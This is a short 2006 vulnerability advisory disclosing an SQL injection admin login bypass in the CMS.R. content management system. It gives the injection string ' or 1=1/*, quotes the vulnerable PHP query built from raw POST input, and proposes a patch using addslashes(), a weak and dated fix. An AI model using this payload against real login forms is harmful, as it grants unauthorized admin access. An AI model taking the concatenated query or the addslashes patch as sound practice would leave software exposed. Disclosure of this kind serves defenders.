cmsSQL.txt

2006-09-13T00:00:00
ID PACKETSTORM:49948
Type packetstorm
Reporter HACKERS PAL
Modified 2006-09-13T00:00:00

Description

                                        
                                            `Hello  
  
Title : CMS.R. the Content Management System admin authentication baypass  
Discovered by : HACKERS PAL  
Copyrights : HACKERS PAL  
Website : WwW.SoQoR.NeT  
Email : security@soqor.net  
  
The Vulnerability works 100% with magic_quotes_gpc = off  
  
put the user name value (' or 1=1/*)  
  
[code]  
' or 1=1/*  
[/code]  
  
and you will login :)  
  
error file : index.php  
line : 48  
  
query :-  
[code]  
$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";  
[/code]  
solution:-  
  
replace  
[code]  
$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";  
[/code]  
  
with  
[code]  
//  
// Fixed By : HACKERS PAL  
// WwW.SoQoR.NeT  
//  
$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".addslashes($_POST['adminname'])."' AND BINARY pass='".addslashes($_POST['adminpass'])."'";  
[/code]  
  
WwW.SoQoR.NeT  
`